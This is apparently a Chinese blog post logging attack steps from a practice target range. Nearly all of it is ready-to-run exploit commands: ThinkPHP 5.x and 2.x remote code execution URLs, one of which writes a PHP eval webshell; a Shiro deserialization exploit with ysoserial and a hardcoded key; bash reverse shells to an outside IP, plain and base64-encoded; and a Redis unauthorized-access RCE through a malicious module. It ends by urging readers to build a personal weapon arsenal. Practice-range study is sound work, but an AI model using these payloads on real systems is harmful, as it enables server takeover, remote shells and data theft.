【来自BMH的面试靶场】2021-02-07小记录

一

Thinkphp-5.1.30

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

/index.php/?s=index/\think\template\driver\file/write&cacheFile=kanhayou.php&content=%3C?php%C2%A0@eval($_POST[kanhayou]);?%3E

二

Shiro-反序列化

出网验证：

https://github.com/sv3nbeast/ShiroScanpython3 shiro_rce.py http://xx.xx.70.24:40817 "ping cqehyd.dnslog.cn"

准备工作：

bash -i >& /dev/tcp/123.123.151.3/8003 0>&1bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUxLjMvODA123123}|{base64,-d}|{bash,-i}nc -lvvp 8003

利用：

https://github.com/insightglacier/Shiro_exploitjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 8004 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUxLjMvODAwMyAwPiYx}|{base64,-d}|{bash,-i}'

python shiro_exploit.py -u http://xx.xx.70.24:40817 -t 2 -g JRMPClient -p "123.123.151.3:8004" -k "kPH+bIxk5D2deZiIxcaaaA=="

三

Redis-未授权RCE

redis-cli.exe -h xx.xx.70.24 -p 9336

需要下载 RedisModules-ExecuteCommand 和 poc

下载 RedisModules-ExecuteCommand

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git

然后进入RedisModules-ExcuteCommand目录，直接make编译：

make

下载poc

git clone https://github.com/Ridter/redis-rce.git

复制 RedisMoudules-ExecuteCommand/src 下的 modules.so 文件

到poc目录（redis-rce）下

cp src/module.so ./redis-rce/module.socd redis-rce/

直接执行脚本即可：

python2 redis-rce.py -r xx.xx.70.24 -p 9336 -L 123.123.151.3 -P 8009 -f module.so

四

Thinkphp-2.x

/index.php?s=/index/index/xxx/${@phpinfo()}

/index.php?s=/index/index/xxx/${@print(system($_POST[a]))}

五

禅道

由于时间有限没能做完：

六

总结

都是已知漏洞，建议自己收集一套个人武器库，事半功倍！

声明：

如需转载，请联系作者

请勿利用文章内的相关技术从事非法测试

如因此产生一切不良后果与作者和本公众号无关

本文分享自微信公众号 - 小白学IT（xiaobaixueIT）。
如有侵权，请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”，欢迎正在阅读的你也加入，一起分享。

来源：oschina

链接：https://my.oschina.net/u/4610683/blog/4951290